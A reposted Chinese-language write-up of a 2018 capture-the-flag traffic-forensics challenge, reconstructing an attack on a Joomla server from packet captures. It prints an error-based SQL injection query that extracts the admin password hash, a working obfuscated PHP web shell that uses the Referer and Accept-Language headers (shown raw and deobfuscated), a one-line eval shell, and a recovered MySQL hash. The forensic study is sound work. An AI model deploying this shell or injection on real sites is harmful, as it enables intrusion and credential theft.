題目鏈接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密碼: nux4 題目描述 1.黑客攻擊的第一個受害主機的網(wǎng)卡IP地址 2.黑客對URL的哪一個參數(shù)實施了SQL注入 3.第一個受害主機網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線 例如abc_) 4.第一個受害主機網(wǎng)站數(shù)據(jù)庫的名字 5.Joomla后臺管理員的密碼是多少 6.黑客第一次獲得的php木馬的密碼是什么 7.黑客第二次上傳php木馬是什么時間 8.第二次上傳的木馬通過HTTP協(xié)議中的哪個頭傳遞數(shù)據(jù) 9.內(nèi)網(wǎng)主機的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash) 10.php代理第一次被使用時最先連接了哪個IP地址 11.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時候 12.黑客在內(nèi)網(wǎng)主機中添加的用戶名和密碼是多少 13.黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名

?1.黑客攻擊的第一個受害主機的網(wǎng)卡IP地址

2.黑客對URL的哪一個參數(shù)實施了SQL注入

過濾http包可以看出，攻擊者ip 202.1.1.2? ?服務(wù)器ip 192.168.1.8? ?

并對list[select]參數(shù)進(jìn)行注入，看著時間順序，很明顯是自動化注入，手注的時間間隔沒有這么短呀。

3.第一個受害主機網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線 例如abc_)

?

?從前幾個注入的返回包來看，數(shù)據(jù)庫前綴是ajtuc_

4.第一個受害主機網(wǎng)站數(shù)據(jù)庫的名字

找到最后一個注入，查看返回包，所以第一個受害主機數(shù)據(jù)庫名joomla.ajtuc_users

百度得知Joomla!是一套內(nèi)容管理系統(tǒng)。?使用PHP語言加上MySQL數(shù)據(jù)庫所開發(fā)的軟件系統(tǒng)，可以在Linux、 Windows、MacOSX等各種不同的平臺上執(zhí)行。

5.Joomla后臺管理員的密碼是多少

密碼的提交一般都是post方式，

ip.addr ==192.168.1.8 && http contains "password"?&& http.request.method == POST

?

但看其他表哥說，密碼并不是這個

或者通過查看注入包來找到對應(yīng)的密碼hash后，解密得到。。。

ip.addr == 192.168.1.8 && http contains "password"

三條信息分別回顯

Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq' SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq' SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

可以看到數(shù)據(jù)

qqzvq$2y$10$lXujU7XaUviJDigqqkkq qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq qqzvqzi/8B2QRD7qIlDJeqqkkq

我們觀察sql構(gòu)造，發(fā)現(xiàn)具有前綴和后綴

0x71717a7671 0x71716b6b71

解碼后得到

qqzvq qqkkq

我們?nèi)サ羟熬Y和后綴，可以得到

$2y$10$lXujU7XaUviJDig FMzKy6.wx7EMCBqpzrJdn7 zi/8B2QRD7qIlDJe

于是我們可以得到完整的加密密碼

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe 后面解碼部分就卡住咯 6.黑客第一次獲得的php木馬的密碼是什么
上傳的話 ip.addr ==192.168.1.8 && http

發(fā)現(xiàn)有一個kkkaaa.php 估計就是上傳的馬兒了
數(shù)據(jù)包二
ip.addr ==192.168.1.8 && http contains "kkkaaa.php"

發(fā)現(xiàn)base64，估計用的菜刀連的小馬，所以第一個上傳的馬兒的密碼是zzz

7.黑客第二次上傳php木馬是什么時間

查看kkkaaa.php相關(guān)的流量

z2的值很明顯是hex類型,復(fù)制到winhex后，發(fā)現(xiàn)對應(yīng)的Unicode是一段混淆后的php

<?php $p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5'; $d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>'; $W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base'; $e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>'; $E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}'; $t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>'; $M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto'; $P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>'; $j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion'); $k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>'; $g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>'; $R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o='; $Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>'; $v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]'; $x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E); $N=$j('',$x);$N(); ?>

反混淆的地方卡住了，，，，

反混淆后

<?php function x($t, $k) {$c = strlen($k);$l = strlen($t);$o = "";for ($i = 0; $i < $l;) {for ($j = 0; $j < $c && $i < $l; $j++, $i++) {$o .= $t[$i] ^ $k[$j];}}return $o; } $rr = @$_SERVER["HTTP_REFERER"]; $ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; if ($rr && $ra) {$u = parse_url($rr);parse_str($u["query"], $q);$q = array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);if ($q && $m) {@session_start();$s =& $_SESSION;$i = $m[1][0] . $m[1][1];$h = strtolower(substr(md5($i . "cb42"), 0, 3));$f = strtolower(substr(md5($i . "e130"), 0, 3));$p = "";for ($z = 1; $z < count($m[1]); $z++) {$p .= $q[$m[2][$z]];}if (strpos($p, $h) === 0) {$s[$i] = "";$p = substr($p, 3);}if (array_key_exists($i, $s)) {$s[$i] .= $p;$e = strpos($s[$i], $f);if ($e) {$k = "cb42e130";ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), substr($s[$i], 0, $e))), "cb42e130")));$o = ob_get_contents();ob_end_clean();$d = base64_encode(x(gzcompress($o), "cb42e130"));print "<{$k}>{$d}</{$k}>";@session_destroy();}}} }

所以這是第二個php木馬，上傳時間?17:20:44.248365000?

8.第二次上傳的木馬通過HTTP協(xié)議中的哪個頭傳遞數(shù)據(jù)

從第二個木馬中可以看到

$rr = @$_SERVER["HTTP_REFERER"]; $ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 所以是通過HTTP_REFERER，HTTP_ACCEPT_LANGUAGE來傳遞的數(shù)據(jù)

從z1 參數(shù) b64decode 后，可以看到上傳路徑/var/www/html/joomla/tmp/footer.php

so,第二個木馬的名稱為footer.php

9.內(nèi)網(wǎng)主機的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash)

這里應(yīng)該是黑客拿下服務(wù)器192.168.1.8后，利用該機內(nèi)網(wǎng)滲透

所以 ip.addr ==192.168.1.8 && mysql?

一直到第四個數(shù)據(jù)包才找到和mysql相關(guān)的數(shù)據(jù)

admin/1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

10.php代理第一次被使用時最先連接了哪個IP地址

代理第一次被使用時最先連接了IP? 4.2.2.2

11.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時候

獲取當(dāng)前目錄肯定得有l(wèi)s或者dir

so

ip.addr==192.168.1.8? && (http contains "ls" ||http contains "dir")

一直到第九個包才才找到。。

‘；

黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在18:36:59

可以看到內(nèi)網(wǎng)中的另外一臺主機為192.168.2.20

12.黑客在內(nèi)網(wǎng)主機中添加的用戶名和密碼是多少

內(nèi)網(wǎng)主機的ip為 192.168.2.20?

所以ip.addr ==192.168.2.20 &&http

?

黑客通過1.8服務(wù)器作為跳板，在2.20機器上寫下內(nèi)容為<?php eavl($_POST[123]);?> 的sh.php

可看出2.20為windows機器

菜刀的請求包太多，一個個的decode太麻煩，，可以查看返回包來判斷啥時候在2.20機器上添加的user

18：49：27還沒有kaka用戶，等到18：50：42就出現(xiàn)了kaka用戶，所以說應(yīng)該是在這兩個時間點之間添加的用戶

?

所以黑客在內(nèi)網(wǎng)主機中添加的用戶名和密碼是kaka/kaka?

12黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名
既然是下載，應(yīng)該是利用中國菜刀進(jìn)行下載了，那我們只過濾出post流量，查看命令即可

ip.dst == 192.168.2.20 && http.request.method==POST ?

?

?so,下載的文件為 lsass.exe_180208_185247.dmp

//copy z1,z2的value時，用快捷鍵(Ctrl+shfit+v)比較方便

?

轉(zhuǎn)載于:https://www.cnblogs.com/1go0/p/10052228.html

總結(jié)

以上是生活随笔為你收集整理的2018信息安全铁人三项第三赛区数据赛题解的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。